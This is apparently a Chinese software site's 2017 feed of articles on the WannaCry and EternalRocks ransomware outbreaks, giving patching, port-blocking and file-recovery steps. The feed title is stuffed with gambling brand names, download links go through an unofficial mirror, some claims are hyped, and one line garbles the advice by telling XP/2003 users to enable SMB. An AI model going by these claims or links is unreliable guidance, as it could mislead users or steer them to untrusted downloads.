西西软件 - 安全中心-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com/ 安全中心 zh-cn http://www.pjyuanjian.com Copyright 2010 http://www.pjyuanjian.com, All Rights Reserved 2019/5/21 14:27:17 [系统安全]永恒之石病毒厉害吗 永恒之石病毒查杀方法一览-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/156044_1.html 西西 系统安全 2017/5/23 15:34:05 <p>永恒之蓝勒索病毒已经过时了,现在又出了新病毒永恒之石,比勒索病毒还要厉害,相当于7个勒索病毒,所以大家一定要有防范意识,为了防患于未然下面小编就来给大家介绍一下查杀方法!</p><h3>永恒之石NSA漏洞专杀方法:</h3><p>1、关闭路由DMZ</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395245368.png"/></p><p>2、禁止部分端口<br/>已知被攻击的端口有<br/>135 137 138 139 445&nbsp;<br/>关闭方法:<br/>(1)、控制面板-windows防火墙-高级设置。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395222671.png"/></p><p><br/>(2)、点击入站规则。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395256322.png"/></p><p>(3)、新建规则。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395375257.png"/></p><p>(4)、选择端口,下一步。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395397691.png"/></p><p>(5)、选择一个需要关闭的端口</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395318908.png"/></p><p>(6)、阻止连接</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395346950.png"/></p><p>将其他端口也依次如上操作即可</p><p>解决方法二</p><p>(1)、打开组策略。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395352559.png"/></p><p>(2)、建立一个策略。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395380601.png"/></p><p>(3)、如图建立规则。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051509395386210.png"/></p><h3>永恒之石NSA漏洞专杀如何防护:</h3><p>一、目前微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快为电脑安装此补丁,网址为https://technet.microsoft.com/zh-cn/library/security/MS17-010;对于XP、2003等微软已不再提供安全更新的机器,建议升级操作系统版本,或关闭受到漏洞影响的端口,可以避免遭到勒索软件等病毒的侵害。</p><p>二、一旦发现中毒机器,立即断网。</p><p>三、启用并打开“Windows防火墙”,进入“高级设置”,在入站规则里禁用“文件和打印机共享”相关规则。关闭UDP135、445、137、138、139端口,关闭网络文件共享。</p><p>四、严格禁止使用U盘、移动硬盘等可执行摆渡攻击的设备。</p><p>五、尽快备份自己电脑中的重要文件资料到存储设备上。</p><p>六、及时更新操作系统和应用程序到最新的版本。</p><p>七、加强电子邮件安全,有效的阻拦掉钓鱼邮件,可以消除很多隐患。</p><p>八、安装正版操作系统、Office软件等。</p><p>&nbsp;</p> [系统安全]永恒之石病毒怎么预防 永恒之石病毒防御查杀方法-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/156040_1.html 西西 系统安全 2017/5/23 15:30:42 <p>永恒之石病毒已经开启,比之前的永恒之蓝病毒更加厉害,永恒之石病毒顶7个nas病毒,大家也不可小觑,如果你还没有防范,那么就赶紧来看看永恒之石病毒防御方法吧!</p><h3>新病毒永恒之石是什么病毒?</h3><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705231532371233152.png"/></p><p>本月月初,WannaCry病毒就瘫痪了许多国家的医院、学校和办公机构,受影响的电脑超过30万台,不过这个病毒也只是用了2个NSA漏洞。在WannaCry肆虐几天后,网络上还出现了与它共用漏洞的新病毒Adylkuzz,该病毒不勒索比特币,而是利用用户计算机挖矿(挖掘虚拟货币)。</p><p>现在,则又轮到了“永恒之石”。克罗地亚计算机紧急响应小组的网络安全专家米罗斯拉夫首先发现了异动,他还在GitHub上对病毒进行了介绍。</p><p>NSA泄露的工具大多与标准文档分享技术有关,它们来自微软Windows Server Message Block,也是WannaCry能快速传播的罪魁祸首。微软今年3月就封堵了漏洞,但由于人们没有升级电脑,因此很容易被感染。</p><p>与WannaCry不同,现在永恒之石还处于安静的潜伏状态,感染一台电脑后,它会下载Tor(洋葱路由)的个人浏览器并向病毒隐藏的服务器发信号。</p><p>随后就是24小时的潜伏期,在这之内病毒会按兵不动。但一天时间过去后,服务器会启动,病毒和开始下载并自我复制,这就意味着安全专家的研究进度会被拖慢一天。</p><h3>新病毒永恒之石如何防范 永恒之石病毒具体查杀方法</h3><p>眼下,永恒之石虽然在不断传播,但还处在休眠状态。米罗斯拉夫警告称,这款病毒可能随时会武器化,它的策略与WannaCry的手段如出一辙,先感染大量电脑再集中爆发。</p><p>由于一直保持神秘,因此永恒之石到底感染了多少电脑现在还不清楚,同时它到底会成为什么样的攻击武器也是个谜。Plixer 认为这款病毒可能会变成勒索病毒或特洛伊木马,对银行发动攻击。</p><p>WannaCry事件后,NSA受到了各界的批评,美国国会甚至有了新提案,要求政府把手上的网络攻击武器交给独立的审查委员会。对于此事,NSA并未发表评论。</p><p>&nbsp;</p> [系统安全]新病毒永恒之石是什么 永恒之石和永恒之蓝有什么区别-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/156035_1.html 西西 系统安全 2017/5/23 15:26:12 <p>今天媒体发布了新病毒永恒之石也已经入侵了多家企业,勒索病毒还没有完全消灭,永恒之石病毒已经来袭,那么这个病毒到底有什么厉害之处了,和永恒之蓝病毒又有什么区别呢,下面小编就来给大家介绍一下!</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705231528569172148.png"/></p><h3>病毒介绍</h3><p>勒索病毒WannaCry的余波还未消散,就有更恐怖的新病毒出现了。上周末,研究人员发现了名为EternalRocks(永恒之石)的新病毒,这个病毒变本加厉,居然一次用了7个来自NSA的漏洞。安全专家称如果该病毒突然发动攻击,将带来“末日”般的恐怖后果。</p><p>本月月初,WannaCry病毒就瘫痪了许多国家的医院、学校和办公机构,受影响的电脑超过30万台,不过这个病毒也只是用了2个NSA漏洞。在WannaCry肆虐几天后,网络上还出现了与它共用漏洞的新病毒Adylkuzz,该病毒不勒索比特币,而是利用用户计算机挖矿(挖掘虚拟货币)。</p><p>现在,则又轮到了“永恒之石”。克罗地亚计算机紧急响应小组的网络安全专家米罗斯拉夫首先发现了异动,他还在GitHub上对病毒进行了介绍。</p><p>NSA泄露的工具大多与标准文档分享技术有关,它们来自微软Windows Server Message Block,也是WannaCry能快速传播的罪魁祸首。微软今年3月就封堵了漏洞,但由于人们没有升级电脑,因此很容易被感染。</p><p>与WannaCry不同,现在永恒之石还处于安静的潜伏状态,感染一台电脑后,它会下载Tor(洋葱路由)的个人浏览器并向病毒隐藏的服务器发信号。随后就是24小时的潜伏期,在这之内病毒会按兵不动。但一天时间过去后,服务器会启动,病毒和开始下载并自我复制,这就意味着安全专家的研究进度会被拖慢一天。</p><p>“提供24小时的缓冲期说明黑客们想尽量保持神秘。”安全公司Plixer CEO迈克尔·帕特森说道。“想要侦测并阻止所有病毒,现在几乎已经不可能了。”</p><p>眼下,永恒之石虽然在不断传播,但还处在休眠状态。米罗斯拉夫警告称,这款病毒可能随时会武器化,它的策略与WannaCry的手段如出一辙,先感染大量电脑再集中爆发。</p><p>由于一直保持神秘,因此永恒之石到底感染了多少电脑现在还不清楚,同时它到底会成为什么样的攻击武器也是个谜。Plixer 认为这款病毒可能会变成勒索病毒或特洛伊木马,对银行发动攻击。</p><p>WannaCry事件后,NSA受到了各界的批评,美国国会甚至有了新提案,要求政府把手上的网络攻击武器交给独立的审查委员会。对于此事,NSA并未发表评论。</p> [病毒漏洞]永恒之石病毒怎么预防 永恒之石病毒预防攻略-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/155914_1.html 西西 病毒漏洞 2017/5/23 10:00:18 <p>永恒之石病毒怎么预防,永恒之石病毒预防攻略。勒索病毒才过去几天,研究人员发现了更加恐怖的新病毒-EternalRocks(永恒之石),这个病毒很是强势,还在潜伏期,小伙伴们需要做好预防措施,永恒之石病毒怎么预防,西西小编为大家带来永恒之石病毒预防攻略。</p><p><a href="http://www.pjyuanjian.com/soft/491171.html" target="_self"><strong>永恒之石病毒查杀工具下载</strong></a></p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705231016565722852.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>永恒之石病毒怎么预防</strong></span></p><p>勒索病毒WannaCry的余波还未消散,就有更恐怖的新病毒出现了。上周末,研究人员发现了名为EternalRocks(永恒之石)的新病毒,这个病毒变本加厉,居然一次用了7个来自NSA的漏洞。安全专家称如果该病毒突然发动攻击,将带来“末日”般的恐怖后果。</p><p>克罗地亚计算机紧急响应小组的网络安全专家米罗斯拉夫首先发现了异动,他还在GitHub上对病毒进行了介绍。</p><p>NSA泄露的工具大多与标准文档分享技术有关,它们来自微软Windows Server Message Block,也是WannaCry能快速传播的罪魁祸首。微软今年3月就封堵了漏洞,但由于人们没有升级电脑,因此很容易被感染。</p><p>微软的小伙伴赶紧升级电脑哦!</p> [病毒漏洞]永恒之石病毒怎么破解 中了永恒之石病毒怎么办-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/155905_1.html 西西 病毒漏洞 2017/5/23 9:39:07 <p>永恒之石病毒怎么破解,中了永恒之石病毒怎么办。在勒索病毒后,又出现了更加恐怖的新病毒永恒之石,这个病毒一次用了7个来自NSA的漏洞,很是恐怖,永恒之石病毒怎么破解,中了永恒之石病毒怎么办,西西小编来为大家介绍。</p><p><a href="http://www.pjyuanjian.com/soft/491171.html" target="_self"><strong>永恒之石病毒查杀工具下载</strong></a></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/201705230957176741834.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>永恒之石病毒怎么破解</strong></span></p><p>勒索病毒WannaCry的余波还未消散,就有更恐怖的新病毒出现了。上周末,研究人员发现了名为EternalRocks(永恒之石)的新病毒,这个病毒变本加厉,居然一次用了7个来自NSA的漏洞。安全专家称如果该病毒突然发动攻击,将带来“末日”般的恐怖后果。</p><p>克罗地亚计算机紧急响应小组的网络安全专家米罗斯拉夫首先发现了异动,他还在GitHub上对病毒进行了介绍。</p><p><strong>NSA泄露的工具大多与标准文档分享技术有关,它们来自微软Windows Server Message Block,也是WannaCry能快速传播的罪魁祸首。微软今年3月就封堵了漏洞,但由于人们没有升级电脑,因此很容易被感染。</strong></p><p>与WannaCry不同,现在永恒之石还处于安静的潜伏状态,感染一台电脑后,它会下载Tor(洋葱路由)的个人浏览器并向病毒隐藏的服务器发信号。</p><p>随后就是24小时的潜伏期,在这之内病毒会按兵不动。但一天时间过去后,服务器会启动,病毒和开始下载并自我复制,这就意味着安全专家的研究进度会被拖慢一天。</p><p>“提供24小时的缓冲期说明黑客们想尽量保持神秘。”安全公司Plixer CEO迈克尔·帕特森说道。“想要侦测并阻止所有病毒,现在几乎已经不可能了。”</p><p>眼下,永恒之石虽然在不断传播,但还处在休眠状态。米罗斯拉夫警告称,这款病毒可能随时会武器化,它的策略与WannaCry的手段如出一辙,先感染大量电脑再集中爆发。</p><p>由于一直保持神秘,因此永恒之石到底感染了多少电脑现在还不清楚,同时它到底会成为什么样的攻击武器也是个谜。Plixer 认为这款病毒可能会变成勒索病毒或特洛伊木马,对银行发动攻击。</p><p>WannaCry事件后,NSA受到了各界的批评,美国国会甚至有了新提案,要求政府把手上的网络攻击武器交给独立的审查委员会。对于此事,NSA并未发表评论。</p> [防护教程]360勒索蠕虫病毒文件恢复工具使用方法 勒索病毒文件恢复图文教程-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/154059_1.html 西西 防护教程 2017/5/15 11:38:07 <p>360勒索蠕虫病毒文件恢复工具使用方法,勒索病毒文件恢复图文教程,针对近日出现的WNCRY病毒疯狂攻击,360推出的勒索蠕虫病毒文件恢复工具可以有效避免病毒攻击和恢复被破坏的文件,下面带来360勒索蠕虫病毒文件恢复工具使用方法图文教程。</p><p><span style="color: rgb(255, 0, 0);"><strong>360勒索蠕虫病毒文件恢复工具下载地址:<a href="http://www.pjyuanjian.com/soft/484666.html" target="_blank">点击下载</a></strong></span></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/201705151450367696958.png"/></p><p><br/></p><p><span style="color: rgb(255, 0, 0);"><strong>360勒索蠕虫病毒文件恢复工具使用方法教程</strong></span></p><p>选择加密文件所在驱动器</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504049501.jpg"/></p><p>扫描后,选择要恢复的文件</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504021194.jpg"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504049764.jpg"/></p><p>强烈建议您选择把恢复的文件保存在干净的移动硬盘或U盘上</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051514504038283.jpg"/></p><p>本工具的文件恢复成功率会受到文件数量、时间、磁盘操作情况等因素影响。一般来说,中毒后越早恢复,成功的几率越高。</p><p>我们尽力而为,但无法确保能够成功恢复多大比例的文件。祝您好运!</p> [防护教程]金山毒霸怎么修复比特币勒索病毒 免费修复工具介绍-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/154008_1.html 西西 防护教程 2017/5/15 11:09:33 <p>比特币勒索病毒是现在最广泛传播的病毒,不少小伙伴最怕的就是电脑有重要东西出现病毒该怎么办,因此就让小编给大家详细的讲讲怎么进行修复,想知道的小伙伴一起来看看吧。</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/14948182301622342.png"/></p><p><strong>免费修复工具介绍</strong></p><p><strong>金山毒霸免费查杀软件:<a href="http://www.pjyuanjian.com/soft/484134.html" _src="https://pic.cr173.com/soft/484134.html">http://www.pjyuanjian.com/soft/484134.html</a></strong></p><p>如果你的电脑感染了勒索病毒后,病毒首先将电脑上的原始文件(图片、文档等加密),生成一个加密文件,并删除原始文件,而如果你想解决这个事情,只有三个办法:</p><p>1、给勒索者付钱,但真的这么做了对方还不确定是否给你解密;</p><p>2、下载杀毒软件进行帮忙,比如昨天金山毒霸推出了专业数据恢复工具,恢复概率较高(下载金山毒霸后,用免费帐号ksda679795862,密码:kingsoft来进行恢复数据);</p><p>3、使用备份(云盘、网盘以及个人移动数据盘),这跟大家以往良好的使用习惯有关,但是数据恢复前一定要进行杀毒,不要再次感染。</p> [防护教程]永恒之蓝勒索病毒怎么破解 永恒之蓝勒索病毒解决方法介绍-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/153943_1.html 西西 防护教程 2017/5/15 9:34:29 <p>永恒之蓝勒索病毒不少小伙伴遇到都很害怕不知道怎么解决,有什么好的办法进行解决,因此不知道的小伙伴们,就让小编给大家详细的讲讲解决办法吧。</p><p align="center"><strong><img src="https://pic.cr173.com/up/2017-5/14948128227440290.png"/></strong></p><p><strong>永恒之蓝勒索病毒解决方法介绍</strong></p><p>据安全专家介绍,目前发现的蠕虫会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入执行勒索程序、远程控制木马、虚拟货币挖矿机等恶意程序。</p><p>大型机构具有网络庞大、接入方式复杂、设备数量众多、敏感数据多、业务连续性要求高等特点,尤其是生产系统的可用性和可靠性要求极高,出现安全事件的负面影响很大。为切实避免“永恒之蓝”勒索蠕虫对业务系统和办公终端带来影响,专家建议通过集中管控的方式对防护策略进行统一下发和管理。</p><p>针对关于大型机构的 “永恒之蓝”勒索蠕虫攻击防范,360安全监测与响应中心的专家表示:</p><p>首先应该确认影响范围,确保Win7及以上版本的系统安装MS17-010补丁。Win7以下的Windows XP/2003开启SMB服务。</p><p>针对大型机构的应急防范措施,专家建议应从DMZ非军事化隔离区、生产区域、办公区域、互联网边界的网络和终端层面全面做好紧急抑制工作。</p><p>安全专家强烈建议 网络管理员在网络边界的防火墙上阻断445端口的访问,如果边界上有IPS和360天堤智慧防火墙之类的设备,请升级设备的检测规则到最新版本并设置相应漏洞攻击的阻断,直到确认网内的电脑已经安装了MS17-010补丁或关闭了Server服务。</p> [防护教程]360nsa武器库免疫工具在哪 nsa武器库免疫工具使用方法教程-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/153961_1.html 西西 防护教程 2017/5/15 8:20:50 <p>360nsa武器库免疫工具在哪,nsa武器库免疫工具使用方法教程,针对近日出现的勒索病毒,360推出了nsa武器库免疫工具(附下载地址),可以应对勒索病毒攻击,同时修复用户的windows电脑漏洞,下面西西带来360nsa武器库免疫工具使用方法教程。</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705151014536677427.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>360nsa武器库免疫工具下载地址:<a href="http://www.pjyuanjian.com/soft/484308.html" target="_blank">点击下载</a></strong></span></p><p>近百国遭黑客攻击。昨日,全球电脑用户遭遇新的病毒大范围攻击。一个勒索病毒变种在全球范围内出现爆发态势,全球多个国家爆发勒索病毒攻击,中国高校等内网用户也出现感染情况,众多师生的电脑文件被病毒加密,昨日已有包括中山大学等高校纷纷发布紧急通知。</p><p>广州日报全媒体记者昨日采访国内信息安全专家获悉,该病毒主要是利用Windows的445端口传播,而此前部分运营商对个人用户封掉了445端口,同时,目前已有国内信息安全公司开发出快速升级工具,可以应对勒索病毒攻击。专家表示,个人电脑用户不必过于惊慌。</p><p><span style="color: rgb(255, 0, 0);"><strong>nsa武器库免疫工具使用方法教程</strong></span></p><p style="text-align: center;"><embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=10543828&amp;page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"/><br/></p><p><strong>多所高校发布风险提醒</strong></p><p>据悉,昨日中国有高校也出现感染情况,众多师生的电脑文件被病毒加密,只有支付赎金才能恢复。据360安全中心分析,此次大规模爆发勒索病毒是由NSA泄漏的“永恒之蓝”黑客工具包传播的,黑客使用NSA泄漏的黑客工具包攻击Windows漏洞,把ONION、WNCRY等勒索病毒在校园网快速传播感染,而“永恒之蓝”可远程攻击Windows的445端口(文件共享),如果系统没有安装今年3月的微软补丁,无需用户任何操作,只要开机上网,“永恒之蓝”就能在电脑里执行任意代码,植入勒索病毒等恶意程序。</p><p>昨日,包括中山大学、南开大学、山东大学、西安电子科技大学以及贵州大学等多所国内高校已经发布了关于防范勒索软件病毒的紧急通知。</p><p>勒索金额高达5万多元</p><p>据悉,目前“永恒之蓝”传播的勒索病毒以ONION和WNCRY两个家族为主,受害机器的磁盘文件会被篡改为相应的后缀,图片、文档、视频、压缩包等各类资料都无法正常打开,只有支付赎金才能解密恢复。这两类勒索病毒,勒索金额分别是5个比特币和300美元,折合人民币分别为5万多元和2000多元。</p><p>360安全工程师针对校园网勒索病毒事件的监测数据显示,国内首先出现的是ONION病毒,平均每小时攻击约200次,夜间高峰期达到每小时1000多次;WNCRY勒索病毒则是5月12日下午新出现的全球性攻击,并在中国的校园网迅速扩散,夜间高峰期每小时攻击约4000次。</p><p><strong>个人用户不必过于惊慌</strong></p><p>个人电脑用户面临的风险有多大?360首席安全工程师郑文彬昨日接受广州日报全媒体记者采访时表示,由于以前国内多次爆发利用445端口传播的病毒,部分运营商已经对个人用户封掉445端口,因此个人用户不必过于惊慌。当下,建议个人电脑用户先对自己的电脑操作系统进行升级。据悉,由于教育网没有封掉445端口,仍然存在大量暴露445端口的机器,因此存在被攻击风险。</p><p>记者体验:</p><p><strong>一键修复漏洞</strong></p><p>据悉,针对NSA黑客武器利用的Windows系统漏洞,微软在今年3月已发布补丁修复。郑文彬表示,此前360安全中心也已推出“NSA武器库免疫工具”,能够一键检测修复NSA黑客武器攻击的漏洞;而对WindowsXP、Windows2003等已经停止更新的系统,360推出的免疫工具可以关闭漏洞利用的端口,防止电脑被NSA黑客武器植入勒索病毒等恶意程序。记者昨日使用“NSA武器库免疫工具”对自己的电脑系统进行检测,发现电脑存多个漏洞,但在使用“NSA武器库免疫工具”进行修复之后,立即就显示漏洞已经被修补。</p> [防护教程]360安全卫士怎么解决比特币勒索病毒 比特币勒索病毒二种解决办法分享-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/153848_1.html 西西 防护教程 2017/5/13 11:32:03 <p>比特币勒索病毒大面积爆发,很多小伙伴很担心会出现问题。或者有的小伙伴电脑已经出现这样类似的问题,因此想要知道怎么解决,就让小编给大家详细的讲讲吧。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/14946467458065138.png"/></p><p><strong>比特币勒索病毒二种解决办法分享</strong></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/14946467536660536.png"/></p><p><span style="color: rgb(192, 0, 0);">方案一:</span></p><p>1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快安装此安全补丁,网址为https://technet.microsoft.com/zh-cn/library/security/MS17-010;对于windows XP、2003等微软已不再提供安全更新的机器,可使用360“NSA武器库免疫工具”检测系统是否存在漏洞,并关闭受到漏洞影响的端口,可以避免遭到勒索软件等病毒的侵害。免疫工具下载地址:http://dl.360safe.com/nsa/nsatool.exe。</p><p>2、<a href="http://www.pjyuanjian.com/html/153873_1.html" target="_blank">关闭445、135、137、138、139端口</a>,关闭网络共享。</p><p>3、强化网络安全意识:不明链接不要点击,不明文件不要下载,不明邮件不要打开……</p><p>4、尽快(今后定期)备份自己电脑中的重要文件资料到移动硬盘、U盘,备份完后脱机保存该磁盘。</p><p>5、建议仍在使用windows xp,windows 2003操作系统的用户尽快升级到window 7/windows 10,或windows 2008/2012/2016操作系统。</p><p><span style="color: rgb(192, 0, 0);">方案二:</span></p><p>目前,360国内首家推出了360反勒索服务</p><p>针对目前流行的使用非对称加密的特定木马家族,提供文档还原解密服务。</p><p>为您服务的可都是360顶级的反病毒专家,牛不牛吧</p><p>那还不快来开启服务,拯救您的文档,就在此刻</p><p>只要下载安装最新安全卫士11.0Beta版,点击主界面中 “反勒索服务”</p><p>在界面中,开启反勒索服务。开启成功后,若您不幸遭遇敲诈者木马,同时360未及时给您进行风险提示,360将帮您支付最高3比特币的赎金,并全力帮您恢复被加密文档</p><p><span style="font-size: 18px;"><strong>360安全卫士11.0最新版下载:<a href="http://dl2.360safe.com/partner/Inst13__3112298__3f7372633d6c6d266c733d6e33646634333330323962__68616f2e3336302e636e__0c66.exe" target="_blank">360官网下载地址</a></strong></span></p> [防护教程]中了比特币勒索病毒怎么办 比特币勒索病毒解决办法介绍-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/153841_1.html 西西 防护教程 2017/5/13 10:49:12 <p>比特币勒索病毒是现在广泛传播,很多小伙伴都担心自己的电脑中毒,不知道自己该怎么进行解决,因此不知道的小伙伴,就让小编给大家详细的讲讲吧。</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/14946462493520643.png"/></p><p><strong>比特币勒索病毒解决办法介绍</strong></p><p>目前,360国内首家推出了360反勒索服务</p><p>针对目前流行的使用非对称加密的特定木马家族,提供文档还原解密服务。</p><p>为您服务的可都是360顶级的反病毒专家,牛不牛吧</p><p>那还不快来开启服务,拯救您的文档,就在此刻</p><p>只要下载安装最新安全卫士11.0Beta版,点击主界面中 “反勒索服务”</p><p>在界面中,开启反勒索服务。开启成功后,若您不幸遭遇敲诈者木马,同时360未及时给您进行风险提示,360将帮您支付最高3比特币的赎金,并全力帮您恢复被加密文档</p> [系统安全]如何关闭135/445/139等端口 win关闭135/445/139端口教程【图文】-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/153774_1.html 西西 系统安全 2017/5/13 9:30:12 <p>电脑中有一些端口非常容易被怀恶意的黑客利用导入病毒,近日不少用户中了比特币勒索病毒,那么win7如何关闭135/445/139等危险端口,下面就是关闭135/445/139等端口的方法教程,希望对大家有帮助。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/201705130935018360807.png"/></p><h3><span style="color: rgb(255, 0, 0);">Win7关闭135/445/139端口方法</span></h3><p>在“开始”菜单选择“运行”,输入“gpedit.msc”后回车,打开本地组策略编辑器。依次展开“计算机配置---windows设置---安全设置---ip安全策略,在 本地计算机”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334595778.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334511123.png"/></p><p>以关闭135端口为例(其他端口操作相同):在本地组策略编辑器右边空白处 右键单击鼠标,选择“创建IP安全策略”,弹出IP安全策略向导对话框,单击下一步;在出现的对话框中的名称处写“关闭端口”(可随意填写),点击下一步;对话框中的“激活默认响应规则”选项不要勾选,然后单击下一步;勾选“编辑属性”,单击完成。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334555991.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334618577.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334612705.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334651964.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334623658.png"/></p><p>在出现的“关闭端口 属性”对话框中,选择“规则”选项卡,去掉“使用 添加向导”前边的勾后,单击“添加”按钮。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334674135.png"/></p><p>在弹出的“新规则 属性”对话框中,选择“IP筛选器列表”选项卡,单击左下角的“添加”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334645828.png"/></p><p>出现添加对话框,名称出填“封端口”(可随意填写),去掉“使用 添加向导”前边的勾后,单击右边的“添加”按钮。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334714023.png"/></p><p>在出现的“IP筛选器 属性”对话框中,选择“地址”选项卡,“源地址”选择“任何”,“目标地址”选择“我的IP地址”;&nbsp;&nbsp; 选择“协议”选项卡,各项设置如图片中所示。设置好后点击“确定”。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334758891.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334724976.png"/></p><p>返回到“ip筛选器列表”,点击“确定”。返回到“新规则 属性”对话框。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334740334.png"/></p><p>在ip筛选器列表中选择刚才添加的“封端口”,然后选择“筛选器操作”选项卡,去掉“使用 添加向导”前面的勾,单击“添加”按钮。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334752755.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334773721.png"/></p><p>在“筛选器操作 属性”中,选择“安全方法”选项卡,选择“阻止”选项;在“常规”选项卡中,对该操作命名,点确定。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334728589.png"/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334892393.png"/></p><p>选中刚才新建的“新建1”,单击关闭,返回到“关闭端口 属性“对话框,确认“IP安全规则”中 封端口 规则被选中后,单击 确定。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334841652.png"/></p><p>在组策略编辑器中,可以看到刚才新建的“关闭端口”规则,选中它并单击鼠标右键,选择“分配”选项,使该规则开始应用,完成。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2017-5/2017051309334886520.png"/></p> [病毒漏洞]比特币病毒怎么破解 中了比特币病毒怎么办-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/153767_1.html 西西 病毒漏洞 2017/5/13 9:15:34 <p>比特币病毒最近在国内高高校疯狂传播,不少师生中了比特币病毒,导致电脑被锁。比特币病毒要怎么破解,中了比特币病毒怎么办,下面就和西西一起来看看吧!</p><p align="center"><img src="https://pic.cr173.com/up/2017-5/201705130919186866255.png"/></p><h3>比特币病毒是什么</h3><p>据百度百科,比特币敲诈病毒(CTB-Locker)最早在2015年初传入中国,随后出现爆发式传播。该病毒通过远程加密用户电脑文件,从而向用户勒索赎金,用户只能在支付赎金后才能打开文件。</p><p>其最新变种的敲诈金额为3个比特币,约合人民币6000余元。该病毒通过伪装成邮件附件,一旦受害者点击运行,就会弹出类似“订单详情”的英文文档。这时病毒已经在系统后台悄悄运行,并将在10分钟后开始发作。</p><h3>比特币病毒怎么破解</h3><p>目前并无有效的解决办法,只能重装系统,但受感染的文件无法恢复。</p><p>1.数据备份和恢复措施是发生被勒索事件挽回损失的重要工作。建议各位老师及时对重要文件数据做好异地备份或云备份,以防感染病毒造成损失。</p><p>2.确保所使用电脑防火墙处于打开状态。</p><p>3.不要轻易打开不明邮件或链接。</p><h3>预防比特币病毒方法</h3><p>1、为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快安装此安全补丁,网址为https://technet.microsoft.com/zh-cn/library/security/MS17-010。</p><p>2、关闭445、135、137、138、139端口,关闭网络共享。</p><p>3、强化网络安全意识:不明链接不要点击,不明文件不要下载,不明邮件不要打开。 